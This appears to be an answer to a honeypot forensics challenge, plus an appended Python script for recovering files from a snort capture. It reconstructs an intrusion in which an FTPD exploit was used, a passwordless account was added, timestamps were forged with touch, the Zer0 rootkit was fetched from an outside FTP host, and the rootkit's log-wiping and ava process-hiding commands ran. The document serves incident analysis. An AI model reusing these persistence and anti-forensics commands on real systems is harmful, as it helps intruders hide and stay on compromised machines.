> Which vulnerability did the intruder exploit?

http://www.cert.org/advisories/CA-2000-13.html
Two Input Validation Problems in FTPD

> What ways, and in what order, did the intruder use to connect and run
> commands on the system?

1. telnet - 09/16-18:52:51.989869 217.156.93.166:61200 -> 192.168.1.102:23
   failed login attempts for nobody and uucp

2. tcp 24 - 09/16-18:54:02.316596 217.156.93.166:61202 -> 192.168.1.102:24
   backdoor check for noncompliant SSH

3. tcp 6666 - 09/16-18:54:14.859871 217.156.93.166:61203 -> 192.168.1.102:6666
   backdoor check

4. ftp - 09/16-18:55:45.198773 207.35.251.172:2243 -> 192.168.1.102:21
   hack system through ftp exploit
       id
       w
       dir
       [much meandering around /usr/local blahh blahh]
       passwd -d nobody
       mkdir /etc/X11/applnk/Internet/.etc
       mkdir /etc/X11/applnk/Internet/.etcpasswd
       addusr dns
       passwd dns -d
       touch -acmr /etc/X11/applnk/Internet/.etc /etc/passwd
       touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc
       [much checking with ls with various command line options]

5. telnet - 09/16-19:13:27.206847 217.156.93.166:61209 -> 192.168.1.102:23
   connect back in as nobody
       w
       su dns
       cd /tmp
       mc -s (not found)
       ftp teleport.go.ro
       cd /dev/rd
       mkdir /dev/sdc0
       ftp teleport.go.ro
           grab rootkit Zer0.tar.gz
       extract rootkit
       Go (execute rootkit's setup script)

6. tcp 24 - 09/16-19:51:58.559708 217.156.93.166:61223 -> 192.168.1.102:24
   connects... does what... don't know

7. tcp 24 - 09/16-19:59:48.228693 217.156.93.166:61226 -> 192.168.1.102:24

8. telnet - 09/16-19:59:57.150510 217.156.93.166:61227 -> 192.168.1.102:23

9. tcp 24 - 09/16-20:07:17.066994 217.156.93.166:61230 -> 192.168.1.102:24

10.

> How did the intruder try to hide his edits from the MAC times?

touch -acmr, as well as the rootkit, which performs various log file clean-up
and file time clean-up.

> The intruder downloaded rootkits, what were they called? Are they new/custom
> rootkits?

t0rnkit / Adore / SSH

"Modificat de mine... Viruzzel" - he has modified the scripts to add
additional automation of the installations.

> Recover (tell how you did it too) the rootkits from the snort binary capture

Extract out the binary contents of the transfer (the hex code). Pack the code
using perl or some other programming language, then gunzip and untar. However,
it would be easier to simply pull it from the same location the hacker did (if
you have no scruples). By verifying the directory listing you can be fairly
sure that you are looking at the same package.

> What does the rootkit do to hide the presence of the attacker on the system?

* Specific filesystem mods:

    touch -acmr /etc/default /etc/pam.d
    touch -acmr /etc/default /etc/pam.d/*
    rm -f vrssnk
    rm -f /usr/info/.t0rn/shsml
    rm -rf Zer0
    cd /usr/X11R6/bin/.,/copy/adr/
    rm -rf *tgz
    rm -rf *.c *.h Makefile* cnfad CVS
    rm -rf /bin/.bash_history
    ln -s /dev/null /bin/.bash_history
    touch -acmr /tmp/.dir1 /bin
    touch -acmr /tmp/.dir2 /usr/X11R6/bin
    touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d
    touch -acmr /root /etc
    rm -rf /tmp/.dir*

* Specific to processes that run: it uses Adore's ava program to hide them.

    Go(183): ./ava h /usr/X11R6/bin/.,
    Go(184): ./ava h /usr/info/.t0rn
    Go(185): ./ava h /dev/rd/sdc0
    Go(186): ./ava h /dev/rd/nscd.init
    Go(187): ./ava h /etc/rc.d/rc3.d/S50inet
    Go(188): ./ava h /usr/X11R6/lib/X11/.~
    Go(199): ./ava h /usr/X11R6/bin/.,
    Go(200): ./ava h /usr/info/.t0rn
    Go(201): ./ava h /dev/rd/sdc0
    Go(202): ./ava h /dev/rd/nscd.init
    Go(203): ./ava h /etc/rc.d/rc3.d/S50inet
    Go(204): ./ava h /usr/X11R6/lib/X11/.~

> What did you learn from this exercise?

hmmmm... how important it is to maintain proper security rev levels of
software?

> How long did this challenge take you?

2 hours

Although an email and other actions are appropriate toward the attacker, I
would send an email to teleport.go.ro, whose server is still open to the
username and password that are now available in your logs.

I'm not sure that either the Canadian School Project or ns.desteptarea.ro are
anything more than hosts the hacker bounced through. An email informing them of
the inappropriate use of their systems certainly is called for. An email could
be formally sent to hatcheryhatched@hotmail.com (making the assumption that
that is the hacker's email addy). Certainly nothing that I would write would
provide the proper legal babbling that is necessary prior to taking whatever
other actions are necessary.

later...
jason...

-------------------------------------------------------------------------------
Jason Prost
Network Security Engineer
1.630.795.4248 phone
1.877.434.6146 cell
jprost@telenisus.com
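The recovery step described in the submission (pull the transfer's hex out of the snort capture, repack it into bytes, then gunzip) as an added Python example; this is not part of the original submission. It assumes a snort text hex-dump layout (a timestamp header line, a flags line carrying `Seq:`, hex lines followed by an ASCII column) and builds its own constructed sample with a made-up FTP server address so it runs offline; it also goes one step further than the answer by keying segments on the TCP sequence number, so a retransmitted or out-of-order packet does not corrupt the recovered file and a hole in the capture is reported instead of silently producing a bad archive.

```python
import gzip
import re

TS_RE = re.compile(r'^\d\d/\d\d-\d\d:\d\d:\d\d\.\d+ (\S+) -> (\S+)$')  # packet header line
SEQ_RE = re.compile(r'Seq: 0x([0-9A-Fa-f]+)')                            # TCP flags/seq line
HEX_RE = re.compile(r'^((?:[0-9A-F]{2} ){1,16})')                        # hex column; ASCII column follows
def parse_packets(log_text):
    """Split the dump into packets: src, dst, TCP sequence number, raw payload bytes."""
    packets = []
    for line in log_text.splitlines():
        if m := TS_RE.match(line):
            packets.append({'src': m.group(1), 'dst': m.group(2), 'seq': None, 'data': bytearray()})
        elif packets and (m := HEX_RE.match(line)):  # before SEQ_RE: an ASCII column may contain "Seq:"
            packets[-1]['data'] += bytes.fromhex(m.group(1).replace(' ', ''))
        elif packets and (m := SEQ_RE.search(line)):
            packets[-1]['seq'] = int(m.group(1), 16)
    return packets
def reassemble(log_text, src, dst):
    """Rebuild one direction of a TCP stream (here the FTP data channel); segments keyed by seq collapse retransmits, reorder late packets, and a hole raises."""
    segments = {}
    for p in parse_packets(log_text):
        if (p['src'], p['dst']) == (src, dst) and p['seq'] is not None and p['data']:
            segments.setdefault(p['seq'], bytes(p['data']))  # first copy of a segment wins
    out, expected = bytearray(), None
    for seq in sorted(segments):
        if expected is not None and seq != expected:
            raise ValueError(f'gap in capture before seq 0x{seq:X}')
        out += segments[seq]
        expected = seq + len(segments[seq])
    return bytes(out)
def render_dump(stamp, src, dst, seq, data):
    """Emit one packet in the dump format above; used only to build the constructed sample."""
    lines = [f'{stamp} {src} -> {dst}', 'TCP TTL:45 TOS:0x0 ID:1 DF',
             f'***AP*** Seq: 0x{seq:X}  Ack: 0x0  Win: 0x7D78']
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        hexpart = ' '.join(f'{b:02X}' for b in chunk).ljust(48)
        lines.append(hexpart + ' ' + ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk))
    return '\n'.join(lines + ['=+' * 38])
# Constructed sample: a small gzip file standing in for Zer0.tar.gz, sent from a made-up FTP
# server address, logged out of order with one retransmission plus a payload-less ACK from the victim.
ARCHIVE = gzip.compress(b'stand-in for the Zer0 rootkit archive\n')
SERVER, VICTIM = '10.0.0.5:20', '192.168.1.102:1043'
SAMPLE_LOG = '\n'.join([
    render_dump('09/16-19:13:40.000002', SERVER, VICTIM, 0x1000 + 20, ARCHIVE[20:]),
    render_dump('09/16-19:13:40.000001', SERVER, VICTIM, 0x1000, ARCHIVE[:20]),
    render_dump('09/16-19:13:40.000003', SERVER, VICTIM, 0x1000, ARCHIVE[:20]),
    render_dump('09/16-19:13:40.000004', VICTIM, SERVER, 0x2000, b''),
])
RECOVERED = gzip.decompress(reassemble(SAMPLE_LOG, SERVER, VICTIM))  # gunzip; untar would follow
```

On a real capture, run `reassemble` on the server-to-victim half of the FTP data connection and hash the result before untarring, so the recovered archive can be compared against the directory listing the answer mentions.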